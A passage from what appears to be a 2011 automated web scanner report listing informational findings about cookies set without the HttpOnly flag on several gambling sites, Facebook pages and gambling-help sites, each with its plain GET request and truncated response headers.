Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

12.216. http://www.bigmoneyscratch.com/InviteFriend.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/InviteFriend.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:01 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

12.217. http://www.bigmoneyscratch.com/Mobile.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/Mobile.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:29 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Mobile.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

12.218. http://www.bigmoneyscratch.com/PlayersClub.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/PlayersClub.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:28 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

12.219. http://www.bigmoneyscratch.com/Promotions.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/Promotions.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:03 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

12.220. http://www.bigmoneyscratch.com/Responsible.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/Responsible.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.221. http://www.bigmoneyscratch.com/SecurityAndPrivacy.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/SecurityAndPrivacy.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:08 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

12.222. http://www.bigmoneyscratch.com/Terms.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/Terms.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:04 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Terms.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

12.223. http://www.bigmoneyscratch.com/UnderAge.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/UnderAge.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.224. http://www.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lsd=szS-2; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTfED2OUFMXxmZkOCiFGO; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=szS-2; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.116.65
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 29704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

12.225. http://www.facebook.com/PrimeScratchCards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/PrimeScratchCards

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lsd=ci4lk; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PrimeScratchCards HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=PRnRTabFyBz2fUR8tW4oYCwo; expires=Wed, 15-May-2013 12:31:57 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=ci4lk; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.27.42
Connection: close
Date: Mon, 16 May 2011 12:31:57 GMT
Content-Length: 35761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

12.226. http://www.facebook.com/WinningsCom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/WinningsCom

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lsd=V8GN3; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /WinningsCom?id=tb HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OhnRTeSZjl5Fn1flFpG8JJU9; expires=Wed, 15-May-2013 12:31:54 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=V8GN3; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.102.57
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 41751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

12.227. http://www.facebook.com/crazyscratch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/crazyscratch

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lsd=HCAHZ; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fcrazyscratch; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcrazyscratch; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /crazyscratch HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTUnjv0Wq3vp7H5Lg8kQU; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=HCAHZ; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fcrazyscratch; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcrazyscratch; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.134.58
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 40706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

12.228. http://www.facebook.com/pages/BigMoneyScratch/156518521055171 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/BigMoneyScratch/156518521055171

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lsd=7uzqb; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/BigMoneyScratch/156518521055171 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.229. http://www.facebook.com/pages/PrimeScratchCards/122783514413813 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/PrimeScratchCards/122783514413813

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lsd=DEbk9; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/PrimeScratchCards/122783514413813 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.230. http://www.facebook.com/peoplespostcodelottery previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/peoplespostcodelottery

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lsd=1P6PH; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /peoplespostcodelottery HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=PBnRTUnMC-QzxdCoW9pJpTTF; expires=Wed, 15-May-2013 12:31:56 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=1P6PH; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.53.64
Connection: close
Date: Mon, 16 May 2011 12:31:56 GMT
Content-Length: 36902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

12.231. http://www.gambleaware.co.uk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gambleaware.co.uk
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CONCRETE5=honf4qgul417u80l40kh20d0m4; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.gambleaware.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: CONCRETE5=honf4qgul417u80l40kh20d0m4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta
...[SNIP]...

12.232. http://www.gamblersanonymous.org.uk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gamblersanonymous.org.uk
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

457660eccd85188d7d2891150ac044ff=3eaa237a8f33f5e9108f938ddea1ec7c; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.gamblersanonymous.org.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 12:39:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Set-Cookie: 457660eccd85188d7d2891150ac044ff=3eaa237a8f33f5e9108f938ddea1ec7c; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 16 May 2011 12:39:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

12.233. http://www.hopa.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hopa.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=B7E205F9FF290BAED7305BD74C2DA067; domain=hopa.com; expires=Fri, 16-May-2014 12:10:19 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.hopa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=B7E205F9FF290BAED7305BD74C2DA067; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_4=EncryptedUniqueVisitorID=B7E205F9FF290BAED7305BD74C2DA067&AffiliateID=4&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=4; ASP.NET_SessionId=e01kb5453bgwt555nikmx12o;

Response

12.234. http://www.hopa.com/visit.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hopa.com
Path:	/visit.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_4=EncryptedUniqueVisitorID=EEACA8F7E2BB877FE832932388F7EA58&AffiliateID=4&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=hopa.com; expires=Fri, 16-May-2031 11:41:38 GMT; path=/
UniqueVisitorID=EEACA8F7E2BB877FE832932388F7EA58; domain=hopa.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.235. http://www.info.crazyscratch.com/AboutUs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/AboutUs.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:39 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

12.236. http://www.info.crazyscratch.com/ContactUsFax.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/ContactUsFax.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:35 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsFax.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

12.237. http://www.info.crazyscratch.com/ContactUsMail.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/ContactUsMail.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:19 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

